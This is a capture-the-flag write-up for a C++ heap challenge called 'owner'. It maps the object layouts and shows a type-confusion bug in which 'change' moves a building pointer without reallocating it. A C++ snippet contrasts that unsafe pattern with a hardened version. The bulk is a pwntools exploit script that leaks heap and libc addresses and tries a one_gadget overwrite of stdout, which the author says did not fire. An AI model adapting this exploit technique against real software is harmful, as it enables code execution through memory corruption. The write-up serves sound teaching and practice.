The one_gadget didn't actually work, though.

I figured it probably worked during the actual contest, so I only tried overwriting stdout and moved on (I didn't try any other places worth overwriting, let's leave it).

Got a little more used to C++..!!


Solution notes

At most three buildings.

building
- name
- [0]-[2]  apartment
- [3]-[5]  company
- [6]-[8]  restaurant

apartment (0x50)
- name               a+0
- floor              a+32
- description        a+40
- houses per floor   a+72

company (0x58)
- name               a+0
- floor              a+32
- description        a+40 (char)
- people             a+72
- money per month    a+80

restaurant (0x70)
- name               a+0
- description        a+40
- visiting people    a+72
- money per month    a+80
- menu               a+88
- food price         a+96
- customer pay       a+104

change does not delete the object; it just moves the pointer as-is.

apartment (change) -> restaurant -> edit restaurant

So just by changing a building you can overflow and overwrite.
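An added example, not the challenge's code or the author's: the "change without delete" pattern the notes describe, written in C++ since the target is a C++ binary, next to a version that re-allocates. The class layouts, the slot helpers and the kind() check are assumptions for the demo; the real binary's field sizes are not reproduced.

```cpp
#include <array>
#include <cstddef>
#include <memory>
#include <string>

// Slot table as in the notes: 0-2 apartment, 3-5 company, 6-8 restaurant.
// The slot index is the only thing telling the program what type a pointer has.
enum Kind { APART = 0, COMP = 1, REST = 2 };
constexpr Kind slot_kind(int slot) { return static_cast<Kind>(slot / 3); }
// Layouts are assumptions that only loosely follow the notes; the real binary's
// sizes are not reproduced. kind() is added so the demo can tell what an object
// really is without reading past its end.
struct Building {
  std::string name, description;
  virtual ~Building() = default;
  virtual Kind kind() const = 0;
};
struct Apartment : Building { int floors = 0, housesPerFloor = 0;
  Kind kind() const override { return APART; } };
struct Company : Building { int floors = 0, people = 0; long moneyPerMonth = 0;
  Kind kind() const override { return COMP; } };
struct Restaurant : Building { int visitors = 0; long moneyPerMonth = 0;
  std::string menu; long price = 0, customerPay = 0;
  Kind kind() const override { return REST; } };
using Slots = std::array<Building*, 9>;

// Vulnerable pattern: "change" moves the pointer into another group without freeing
// or re-allocating. Code that trusts the slot index then reads a (smaller) apartment
// with the (larger) restaurant layout, so the extra fields alias the next heap chunk.
void change_unsafe(Slots& s, int from, int to) { s[to] = s[from]; s[from] = nullptr; }

std::unique_ptr<Building> make_kind(Kind k) {
  if (k == APART) return std::make_unique<Apartment>();
  if (k == COMP) return std::make_unique<Company>();
  return std::make_unique<Restaurant>();
}
// Hardened: validate both slots, build a fresh object of the destination type,
// copy only the fields every building has, then free the old object.
bool change_safe(Slots& s, int from, int to) {
  if (from < 0 || from > 8 || to < 0 || to > 8 || !s[from] || s[to]) return false;
  auto dst = make_kind(slot_kind(to));
  dst->name = s[from]->name;
  dst->description = s[from]->description;
  delete s[from];
  s[from] = nullptr;
  s[to] = dst.release();
  return true;
}
```

After change_unsafe the slot claims a restaurant while kind() still reports an apartment; that gap is exactly what the edit/show menus in the challenge never check.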

from pwn import *
# building types as numbered in the menu: 1. apartment  2. company  3. restaurant
r = process('./owner')

def makeapart(name, floor, house, des):
    r.sendlineafter('>', '1')
    r.sendlineafter('name?', name)
    r.sendlineafter('apartment?', str(floor))
    r.sendlineafter('floor?', str(house))
    r.sendlineafter('Describe', des)

def change(_from_type, _from, _to):
    # move building #_from of type _from_type into another type; the object is
    # neither freed nor re-allocated, only the pointer is moved
    r.sendlineafter('>', '4')
    r.sendlineafter('>', '2')
    r.sendlineafter('>', str(_from_type))
    r.sendlineafter('>', str(_from))
    r.sendlineafter('>', str(_to))
    r.sendlineafter('>', '6')   # go to home menu
    r.sendlineafter('>', '6')

def show(_type, num):
    r.sendlineafter('>', '4')
    r.sendlineafter('>', '1')
    r.sendlineafter('>', str(_type))
    r.sendlineafter('>', str(num))
    # the caller has to go back 3 times afterwards (see back())

def edit(_type, num, obj, cont):
    r.sendlineafter('>', '4')
    r.sendlineafter('>', '1')
    r.sendlineafter('>', str(_type))
    r.sendlineafter('>', str(num))
    r.sendlineafter('>', str(obj))
    r.sendlineafter(':', cont)
    back()

def back():
    for i in range(3):
        r.sendlineafter('>', '9')

makeapart('say2say2', 1234, 1234, 'ABCDABCD')
makeapart('BBBBBBBB', 1234, 1234, '11111111')
# apartment 1 becomes restaurant 1 without re-allocation: the 0x50-byte
# apartment is now read with the 0x70-byte restaurant layout, so the
# restaurant-only fields lie past the end of the apartment object
change(1, 1, 2)
show(3, 1)
r.recvuntil('Normal price of menu : ')
heapbase = int(r.recvuntil('\n')[:-1]) - 0x12cf0      # heap leak
log.info("heapleak : " + hex(heapbase))
back()
edit(3, 1, 1, 'A' * 0x100)
edit(3, 1, 6, str(heapbase + 0x12d40))
show(1, 1)
r.recvuntil('Name : ')
libcbase = u64(r.recv(6).ljust(8, '\x00')) - 0xb78     # libc leak via apartment 1's name
log.info("libcbase : " + hex(libcbase))
stdoutjmp = libcbase + 0x16f8
system = libcbase + 0x45390
oneshot = libcbase + 0xcc618  # other candidates: 0xcc543 0x4526a 0xf0567 0xef6c4
back()
#r.interactive()
log.info("stdoutjmp :" + hex(stdoutjmp))
# overwrite stdout with the one_gadget (see the note at the top: it did not fire)
edit(3, 1, 6, str(stdoutjmp))
edit(1, 1, 1, p64(oneshot))
r.interactive()

